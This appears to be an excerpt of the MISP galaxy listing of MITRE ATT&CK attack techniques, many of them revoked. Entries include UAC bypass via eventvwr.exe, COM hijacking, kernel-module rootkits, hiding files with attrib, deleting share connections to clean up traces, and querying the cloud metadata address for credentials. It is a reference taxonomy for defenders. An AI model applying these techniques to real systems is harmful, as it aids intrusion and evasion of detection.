A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1066"

View relationships graph

Indicator Removal from Tools - T1066 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

Table 3275. Table References
Links
https://attack.mitre.org/techniques/T1066

Exploitation for Privilege Escalation - T1068

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"

Table 3276. Table References
Links
https://attack.mitre.org/techniques/T1068
https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
https://unit42.paloaltonetworks.com/acidbox-rare-malware/
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules

Bypass User Account Control - T1088

Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.

Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

<code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)

Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088"

View relationships graph

Bypass User Account Control - T1088 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 3277. Table References
Links
https://attack.mitre.org/techniques/T1088
https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works
https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx
https://msdn.microsoft.com/en-us/library/ms679687.aspx
http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
https://github.com/hfiref0x/UACME
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware
http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

Exploitation for Defense Evasion - T1211

Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.

Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211"

Table 3278. Table References
Links
https://attack.mitre.org/techniques/T1211

Extra Window Memory Injection - T1181

Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)

Execution granted through EWM injection may take place in the address space of a separate live process. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process’s memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Endgame Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181"

View relationships graph

Extra Window Memory Injection - T1181 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1055.011" with estimative-language:likelihood-probability="almost-certain"

Table 3279. Table References
Links
https://attack.mitre.org/techniques/T1181
https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx
https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx
https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html
https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/
https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx

Exploitation for Credential Access - T1212

Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212"

Table 3280. Table References
Links
https://attack.mitre.org/techniques/T1212
https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
https://adsecurity.org/?p=1515

Component Object Model Hijacking - T1122

The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary’s code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1122"

View relationships graph

Component Object Model Hijacking - T1122 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 3281. Table References
Links
https://attack.mitre.org/techniques/T1122
https://msdn.microsoft.com/library/ms694363.aspx
https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com

Data from Information Repositories - T1213

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.

The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:

Policies, procedures, and standards
Physical / logical network diagrams
System architecture diagrams
Technical system documentation
Testing / development credentials
Work / project schedules
Source code snippets
Links to network shares and other internal resources

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213"

Table 3282. Table References
Links
https://attack.mitre.org/techniques/T1213
https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html

System Network Connections Discovery - T1421

On Android, applications can use standard APIs to gather a list of network connections to and from the device. For example, the Network Connections app available in the Google Play Store (Citation: ConnMonitor) advertises this functionality.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1421"

Table 3283. Table References
Links
https://attack.mitre.org/techniques/T1421
https://play.google.com/store/apps/details?id=com.antispycell.connmonitor&hl=en

Kernel Modules and Extensions - T1215

Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)

Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)

Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)

The tag is: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215"

View relationships graph

Kernel Modules and Extensions - T1215 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006" with estimative-language:likelihood-probability="almost-certain"

Table 3284. Table References
Links
https://attack.mitre.org/techniques/T1215
https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
https://github.com/f0rb1dd3n/Reptile
https://github.com/m0nad/Diamorphine
http://www.megasecurity.org/papers/Rootkits.pdf
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
http://tldp.org/HOWTO/Module-HOWTO/x197.html

Build Image on Host - T1612

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)

An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

The tag is: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612"

Table 3285. Table References
Links
https://attack.mitre.org/techniques/T1612
https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild
https://blog.aquasec.com/malicious-container-image-docker-container-host
https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation

Network Share Connection Removal - T1126

Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. (Citation: Technet Net Use)

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

The tag is: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1126"

View relationships graph

Network Share Connection Removal - T1126 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

Table 3286. Table References
Links
https://attack.mitre.org/techniques/T1126
https://technet.microsoft.com/bb490717.aspx

Signed Script Proxy Execution - T1216

Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)

The tag is: misp-galaxy:mitre-attack-pattern="Signed Script Proxy Execution - T1216"

Table 3287. Table References
Links
https://attack.mitre.org/techniques/T1216
https://github.com/api0cradle/UltimateAppLockerByPassList

Signed Binary Proxy Execution - T1218

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.

The tag is: misp-galaxy:mitre-attack-pattern="Signed Binary Proxy Execution - T1218"

Table 3288. Table References
Links
https://attack.mitre.org/techniques/T1218

Build social network persona - T1341

For attacks incorporating social engineering the utilization of an on-line persona is important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites ([Facebook](https://www.facebook.com), [LinkedIn](https://www.linkedin.com), [Twitter](https://twitter.com), [Google+](https://plus.google.com), etc.). (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

The tag is: misp-galaxy:mitre-attack-pattern="Build social network persona - T1341"

Table 3289. Table References
Links
https://attack.mitre.org/techniques/T1341
https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

Remote access tool development - T1351

A remote access tool (RAT) is a piece of software that allows a remote user to control a system as if they had physical access to that system. An adversary may utilize existing RATs, modify existing RATs, or create their own RAT. (Citation: ActiveMalwareEnergy)

The tag is: misp-galaxy:mitre-attack-pattern="Remote access tool development - T1351"

Table 3290. Table References
Links
https://attack.mitre.org/techniques/T1351
https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/

Container and Resource Discovery - T1613

Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

The tag is: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613"

Table 3291. Table References
Links
https://attack.mitre.org/techniques/T1613
https://docs.docker.com/engine/api/v1.41/
https://kubernetes.io/docs/concepts/overview/kubernetes-api/

Secure and protect infrastructure - T1317

An adversary may secure and protect their infrastructure just as defenders do. This could include the use of VPNs, security software, logging and monitoring, passwords, or other defensive measures. (Citation: KrebsTerracottaVPN)

The tag is: misp-galaxy:mitre-attack-pattern="Secure and protect infrastructure - T1317"

Table 3292. Table References
Links
https://attack.mitre.org/techniques/T1317

Obfuscate or encrypt code - T1319

Obfuscation is the act of creating code that is more difficult to understand. Encoding transforms the code using a publicly available format. Encryption transforms the code such that it requires a key to reverse the encryption. (Citation: CylanceOpCleaver)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate or encrypt code - T1319"

Table 3293. Table References
Links
https://attack.mitre.org/techniques/T1319

Elevated Execution with Prompt - T1514

Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it’s all broken!)

The tag is: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1514"

View relationships graph

Elevated Execution with Prompt - T1514 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1548.004" with estimative-language:likelihood-probability="almost-certain"

Table 3294. Table References
Links
https://attack.mitre.org/techniques/T1514
https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg
https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8
https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/
https://objective-see.com/blog/blog_0x2A.html

Data Encrypted for Impact - T1471

An adversary may encrypt files stored on the mobile device to prevent the user from accessing them, for example with the intent of only unlocking access to the files after a ransom is paid. Without escalated privileges, the adversary is generally limited to only encrypting files in external/shared storage locations. This technique has been demonstrated on Android. We are unaware of any demonstrated use on iOS.

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1471"

Table 3295. Table References
Links
https://attack.mitre.org/techniques/T1471
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html

Hidden Files and Directories - T1158

To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).

Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

Windows

Users can mark specific files as hidden by using the attrib.exe binary. Simply do <code>attrib +h filename</code> to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.

Linux/Mac

Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: <code>defaults write com.apple.finder AppleShowAllFiles YES</code>, and then relaunch the Finder Application.

Mac

Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1158"

View relationships graph

Hidden Files and Directories - T1158 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 3296. Table References
Links
https://attack.mitre.org/techniques/T1158
https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

Gather Victim Org Information - T1591

Adversaries may gather information about the victim’s organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Org Information - T1591"

Table 3297. Table References
Links
https://attack.mitre.org/techniques/T1591
https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
https://www.sec.gov/edgar/search-and-access

Cloud Storage Object Discovery - T1619

Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.

Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Storage Object Discovery - T1619"

Table 3298. Table References
Links
https://attack.mitre.org/techniques/T1619
https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html
https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs

System Network Configuration Discovery - T1422

On Android, details of onboard network interfaces are accessible to apps through the java.net.NetworkInterface class.(Citation: NetworkInterface) The Android TelephonyManager class can be used to gather related information such as the IMSI, IMEI, and phone number.(Citation: TelephonyManager)

On iOS, gathering network configuration information is not possible without root access.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422"

Table 3299. Table References
Links
https://attack.mitre.org/techniques/T1422
https://developer.android.com/reference/java/net/NetworkInterface.html
https://developer.android.com/reference/android/telephony/TelephonyManager.html

Cloud Instance Metadata API - T1522

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1522"

View relationships graph

Cloud Instance Metadata API - T1522 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005" with estimative-language:likelihood-probability="almost-certain"

Table 3300. Table References
Links
https://attack.mitre.org/techniques/T1522
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse

Identify analyst level gaps - T1233

Analysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Identify analyst level gaps - T1233"

Table 3301. Table References
Links
https://attack.mitre.org/techniques/T1233

Generate analyst intelligence requirements - T1234

Analysts may receive Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from leadership or key decision makers and generate intelligence requirements to articulate intricacies of information required on a topic or question. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Generate analyst intelligence requirements - T1234"

Table 3302. Table References
Links
https://attack.mitre.org/techniques/T1234

Identify security defensive capabilities - T1263

Security defensive capabilities are designed to stop or limit unauthorized network traffic or other types of accesses. (Citation: OSFingerprinting2014) (Citation: NMAP WAF NSE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify security defensive capabilities - T1263"

Table 3303. Table References
Links
https://attack.mitre.org/techniques/T1263

Use multiple DNS infrastructures - T1327

A technique used by the adversary similar to Dynamic DNS with the exception that the use of multiple DNS infrastructures likely have whois records. (Citation: KrebsStLouisFed)

The tag is: misp-galaxy:mitre-attack-pattern="Use multiple DNS infrastructures - T1327"

Table 3304. Table References
Links
https://attack.mitre.org/techniques/T1327

Analyze application security posture - T1293

The tag is: misp-galaxy:mitre-attack-pattern="Analyze application security posture - T1293"

Table 3305. Table References
Links
https://attack.mitre.org/techniques/T1293

Malicious Software Development Tools - T1462

As demonstrated by the XcodeGhost attack (Citation: PaloAlto-XcodeGhost1), app developers could be provided with modified versions of software development tools (e.g. compilers) that automatically inject malicious or exploitable code into applications.

Detection: Enterprises could deploy integrity checking software to the computers that they use to develop code to detect presence of unauthorized, modified software development tools.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Software Development Tools - T1462"

View relationships graph

Malicious Software Development Tools - T1462 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 3306. Table References
Links
https://attack.mitre.org/techniques/T1462

Identify technology usage patterns - T1264

Technology usage patterns include identifying if users work offsite, connect remotely, or other possibly less restricted/secured access techniques. (Citation: SANSRemoteAccess)

The tag is: misp-galaxy:mitre-attack-pattern="Identify technology usage patterns - T1264"

Table 3307. Table References
Links
https://attack.mitre.org/techniques/T1264

Generate Fraudulent Advertising Revenue - T1472

An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.

The tag is: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472"

Table 3308. Table References
Links
https://attack.mitre.org/techniques/T1472

Identify sensitive personnel information - T1274

An adversary may identify sensitive personnel information not typically posted on a social media site, such as address, marital status, financial history, and law enforcement infractions. This could be conducted by searching public records that are frequently available for free or at a low cost online. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify sensitive personnel information - T1274"

Table 3309. Table References
Links
https://attack.mitre.org/techniques/T1274

Identify web defensive services - T1256

An adversary can attempt to identify web defensive services as [CloudFlare](https://www.cloudflare.com), [IPBan](https://github.com/jjxtra/Windows-IP-Ban-Service), and [Snort](https://www.snort.org). This may be done by passively detecting services, like [CloudFlare](https://www.cloudflare.com) routing, or actively, such as by purposefully tripping security defenses. (Citation: NMAP WAF NSE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify web defensive services - T1256"

Table 3310. Table References
Links
https://attack.mitre.org/techniques/T1256

Steal Application Access Token - T1528

Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.

